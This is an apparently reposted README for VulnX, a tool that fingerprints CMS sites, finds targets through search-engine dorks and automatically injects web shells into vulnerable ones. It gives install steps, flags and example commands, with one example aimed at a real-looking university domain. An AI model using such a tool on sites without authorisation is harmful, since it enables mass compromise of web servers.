Instead of injecting each and every shell manually like all the other tools do, VulnX analyses the target website checking the presence of a vulnerabilitie if so the shell will be Injected.searching urls with dorks Tool.

Features
  • Detects cms (wordpress, joomla, prestashop, drupal, opencart, magento, lokomedia)
  • Target informations gatherings
  • Target Subdomains gathering
  • Multi-threading on demand
  • Checks for vulnerabilities
  • Auto shell injector
  • Exploit dork searcher
  • Ports Scan High Level
  • Dns-Servers Dump
  • Input multiple target to scan.
  • Dorks Listing by Name& by ExploitName.
  • Export multiple target from Dorks into a logfile.

DNS-Map-Results
To do this,run a scan with the --dns flag and -d for subdomains. To generate a map of isetso.rnu.tn, you can run the command vulnx -u isetso.rnu.tn --dns -d --output $PATHin a new terminal.
$PATH : Where the graphs results will be stored.


Let's generates an image displaying target Subdomains,MX & DNS data.


Exploits


Joomla

Wordpress

Drupal

PrestaShop

Opencart

VulnxMode
NEW vulnx now have an interactive mode. URLSET


DORKSET


Available command line options
READ VULNX WIKI
usage: vulnx [options]

-u --url url target
-D --dorks search webs with dorks
-o --output specify output directory
-t --timeout http requests timeout
-c --cms-info search cms info[themes,plugins,user,version..]
-e --exploit searching vulnerability & run exploits
-w --web-info web informations gathering
-d --domain-info subdomains informations gathering
-l, --dork-list list names of dorks exploits
-n, --number-page number page of search engine(Google)
-p, --ports ports to scan
-i, --input specify domains to scan from an input file
--threads number of threads
--dns dns informations gathering

Docker
VulnX in DOCKER !!.
$ git clone https://github.com/anouarbensaad/VulnX.git
$ cd VulnX
$ docker build -t vulnx ./docker/
$ docker run -it --name vulnx vulnx:latest -u http://example.com
run vulnx container in interactive mode


to view logfiles mount it in a volume like so:
$ docker run -it --name vulnx -v "$PWD/logs:/VulnX/logs" vulnx:latest -u http://example.com
change the mounting directory..
VOLUME [ "$PATH" ]

Install vulnx on Ubuntu
$ git clone https://github.com/anouarbensaad/vulnx.git
$ cd VulnX
$ chmod +x install.sh
$ ./install.sh
Now run vulnx


Install vulnx on Termux
$ pkg update
$ pkg install -y git
$ git clone http://github.com/anouarbensaad/vulnx
$ cd vulnx
$ chmod +x install.sh
$ ./install.sh
CLICK HERE TO SHOW THE RESULT

Install vulnx in Windows
  • click here to download vulnx
  • download and install python3
  • unzip vulnx-master.zip in c:/
  • open the command prompt cmd.
> cd c:/vulnx-master
> python vulnx.py

example command with options : settimeout=3 , cms-gathering = all , -d subdomains-gathering , run --exploits
vulnx -u http://example.com --timeout 3 -c all -d -w --exploit

example command for searching dorks : -D or --dorks , -l --list-dorks
vulnx --list-dorks return table of exploits name. vulnx -D blaze return urls found with blaze dork

Versions

Warning!
I Am Not Responsible of any Illegal Use

Contribution & License
You can contribute in following ways:
  • Report bugs & add issues
  • Search for new vulnerability
  • Develop plugins
  • Searching Exploits
  • Give suggestions (Ideas) to make it better
Do you want to have a conversation in private? email me : Bensaad.tig@gmail.com
VulnX is licensed under GPL-3.0 License




via KitPloit

Related word


  1. Hacking Quotes
  2. Hardware Hacking
  3. Libros Hacking Pdf
  4. Hacking Aves
  5. Experto En Seguridad Informática
  6. Elhacker Ip

Face Book